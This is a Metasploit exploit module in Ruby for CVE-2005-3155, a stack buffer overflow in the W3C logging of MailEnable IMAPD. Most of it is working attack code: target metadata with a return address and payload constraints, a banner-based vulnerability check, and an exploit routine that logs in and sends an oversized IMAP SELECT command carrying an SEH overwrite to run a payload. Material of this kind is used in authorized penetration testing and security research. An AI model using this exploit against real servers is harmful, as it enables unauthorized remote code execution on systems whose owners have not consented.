GitHub Repository: rapid7/metasploit-framework
Path: blob/master/modules/exploits/windows/imap/mailenable_w3c_select.rb
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
# Exploit module for CVE-2005-3155: a stack buffer overflow in the W3C
# logging path of the MailEnable IMAPD service. The metadata below is the
# module's public contract with the framework and is reproduced unchanged;
# only the two instance methods are written in a different style.
class MetasploitModule < Msf::Exploit::Remote
  Rank = GreatRanking

  include Msf::Exploit::Remote::Imap
  include Msf::Exploit::Remote::Seh

  # Registers module metadata (name, references, payload constraints,
  # targets) with the framework via update_info.
  #
  # @param info [Hash] metadata supplied by the framework loader, merged
  #   with the values defined here
  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'MailEnable IMAPD W3C Logging Buffer Overflow',
        'Description' => %q{
          This module exploits a buffer overflow in the W3C logging
          functionality of the MailEnable IMAPD service. Logging is
          not enabled by default and this exploit requires a valid
          username and password to exploit the flaw. MailEnable
          Professional version 1.6 and prior and MailEnable Enterprise
          version 1.1 and prior are affected.
        },
        'Author' => ['MC'],
        'License' => MSF_LICENSE,
        'References' => [
          ['CVE', '2005-3155'],
          ['OSVDB', '19842'],
          ['BID', '15006']
        ],
        'Privileged' => true,
        'DefaultOptions' => { 'EXITFUNC' => 'thread' },
        'Payload' => {
          'Space' => 600,
          # NUL, CR, LF and space are excluded from the encoded payload.
          'BadChars' => "\x00\x0a\x0d\x20",
          'StackAdjustment' => -3500
        },
        'Platform' => 'win',
        'Targets' => [
          ['MailEnable 1.54 Pro Universal', { 'Ret' => 0x1001c019 }] # MEAISP.DLL
        ],
        'DisclosureDate' => '2005-10-03',
        'DefaultTarget' => 0,
        'Notes' => {
          'Reliability' => UNKNOWN_RELIABILITY,
          'Stability' => UNKNOWN_STABILITY,
          'SideEffects' => UNKNOWN_SIDE_EFFECTS
        }
      )
    )
  end

  # Banner-based version check. Connects, disconnects, then inspects the
  # banner captured by the IMAP mixin. Because this only matches a version
  # string it can report at most Appears, never a confirmed vulnerable state;
  # a matching banner with logging disabled is still not exploitable.
  #
  # @return [Exploit::CheckCode] Appears when the banner matches, Safe otherwise
  def check
    connect
    disconnect

    version_matches = banner && banner =~ /MailEnable Service, Version: 0-1\.54/
    version_matches ? Exploit::CheckCode::Appears : Exploit::CheckCode::Safe
  end

  # Authenticates (valid credentials are required, see Description), sends a
  # single oversized SELECT command carrying the SEH record, then hands off
  # to the payload handler and closes the session.
  def exploit
    connect_login

    # Filler stays free of the configured BadChars; the SEH record is
    # appended after it and the whole request goes out in one write.
    filler = rand_text_alphanumeric(6196, payload_badchars)
    seh_record = generate_seh_payload(target.ret)
    sock.put("a01 SELECT #{filler}#{seh_record}\r\n")

    handler
    disconnect
  end
end